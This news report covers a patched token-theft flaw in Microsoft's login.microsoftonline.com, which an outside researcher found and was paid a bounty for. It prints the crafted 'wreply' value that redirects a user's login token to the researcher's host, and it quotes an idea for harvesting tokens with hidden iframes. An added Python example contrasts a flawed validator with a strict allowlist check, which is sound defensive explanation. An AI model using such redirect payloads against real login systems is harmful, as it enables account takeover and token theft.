A security researcher has won a $13,000 bounty from Microsoft for finding a critical flaw in its main authentication system that could have allowed attackers to gain access to a user's Outlook, Azure and Office accounts.
The vulnerability was uncovered by UK-based security consultant Jack Whitton and is similar to the OAuth CSRF (Cross-Site Request Forgery) flaw in Live.com discovered by Synack security researcher Wesley Wineberg.
The one difference between the two bugs is where they sit: the flaw discovered by Wineberg affected Microsoft's OAuth protection mechanism, while the one discovered by Whitton affected Microsoft's main authentication system.
Microsoft handles authentication across its online services including Outlook, Azure and Office through requests made to login.live.com, login.windows.net, and login.microsoftonline.com.
For example, when a user browses to outlook.office.com, they are redirected to a login.microsoftonline.com URL that contains a 'wreply' parameter specifying the domain the user should be sent back to after signing in.
How Does the Vulnerability Work?
If the user is already logged in, a POST request is made back to the domain specified in wreply, carrying a login token for that user. The service the user wants to sign in to consumes the token and logs the user in.
Whitton discovered that the authentication URL was vulnerable to cross-site request forgery (CSRF): because the wreply value was not validated strictly enough, a malicious actor could craft a login URL which, when visited by an authenticated user, would send the login token to a server controlled by the attacker.
The legitimate URL looks like this:
https://login.microsoftonline.com/login.srf?wa=wsignin1.0&rpsnv=4&wreply=https%3a%2f%2foutlook.office.com%2fowa%2f&id=260563
And the attacker could set wreply to this instead:
https%3a%2f%2foutlook.office.com%252f@poc-ssl.fin1te.net%2fmicrosoft%2f%3f
The trick is in the authority part of the URL: the double-encoded slash (%252f) and the '@' leave 'outlook.office.com' in the userinfo position, so the value can pass as an outlook.office.com address while a browser resolves the actual host as poc-ssl.fin1te.net. Whitton found that this caused the login token to be sent to the attacker's website, in this case poc-ssl.fin1te.net. Using the token, the attacker could have gained complete access to the targeted user's account.
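The following added example (not code from the article or from Whitton's post) shows why the crafted wreply value is dangerous. It parses the two login URLs quoted above the way a query-string parser does, reports the host a browser would actually POST the token to, contrasts that with a hypothetical flawed validator that percent-decodes the value a second time before reading the host, and finishes with a strict allowlist check that rejects the malicious value. The double-decoding validator and the ALLOWED_REPLY_HOSTS allowlist are assumptions for illustration; the article does not describe Microsoft's actual validation logic.

```python
from typing import Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed inputs: the legitimate login URL from the article, and the same
# URL with wreply replaced by the researcher's proof-of-concept value.
LEGIT_LOGIN_URL = (
    "https://login.microsoftonline.com/login.srf?wa=wsignin1.0&rpsnv=4"
    "&wreply=https%3a%2f%2foutlook.office.com%2fowa%2f&id=260563"
)
MALICIOUS_LOGIN_URL = (
    "https://login.microsoftonline.com/login.srf?wa=wsignin1.0&rpsnv=4"
    "&wreply=https%3a%2f%2foutlook.office.com%252f@poc-ssl.fin1te.net%2fmicrosoft%2f%3f&id=260563"
)

# Assumption: the service keeps a per-application allowlist of reply hosts.
ALLOWED_REPLY_HOSTS = {"outlook.office.com"}


def wreply_param(login_url: str) -> str:
    """Extract wreply as any query-string parser does: exactly one round of %-decoding."""
    query = urlsplit(login_url).query
    return parse_qs(query)["wreply"][0]


def browser_host(login_url: str) -> Optional[str]:
    """Host the browser will really connect to: the part of the authority after the last '@'."""
    return urlsplit(wreply_param(login_url)).hostname


def double_decoded_host(login_url: str) -> Optional[str]:
    """Hypothetical flawed validator: decodes wreply a second time, turning %2f into '/'
    so that '@poc-ssl.fin1te.net' drops out of the authority and into the path."""
    return urlsplit(unquote(wreply_param(login_url))).hostname


def strict_allows(login_url: str) -> bool:
    """Hardened check: parse once, require https, refuse any userinfo or leftover
    encoding in the authority, and compare the host against the allowlist."""
    parts = urlsplit(wreply_param(login_url))
    if parts.scheme != "https":
        return False
    if parts.username is not None or parts.password is not None:
        return False
    if "%" in parts.netloc:  # encoded bytes in the authority mean parsers may disagree
        return False
    return parts.hostname in ALLOWED_REPLY_HOSTS


if __name__ == "__main__":
    for name, url in (("legit", LEGIT_LOGIN_URL), ("malicious", MALICIOUS_LOGIN_URL)):
        print(name)
        print("  wreply as decoded:      ", wreply_param(url))
        print("  browser connects to:    ", browser_host(url))
        print("  double-decode check sees:", double_decoded_host(url))
        print("  strict check allows:    ", strict_allows(url))
```

Run it and the malicious URL shows the split: the double-decoding check reports outlook.office.com while the browser would deliver the token to poc-ssl.fin1te.net. The strict check rejects it on two independent grounds (a username component and a '%' in the authority), which is the property a reply-URL validator needs: decode the same number of times the client will, and never let the host decision rest on a prefix string match.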
"The token is only valid for the service that issued it – an Outlook token cannot be used for Azure, for example," Whitton noted in his blog post. "But it would be simple enough to create multiple hidden iframes, each with the login URL set to a different service, and harvest tokens that way."
The good news is that Microsoft patched the vulnerability within two days of Whitton reporting it to the company on January 24. The company also paid the researcher $13,000 under its bug bounty program.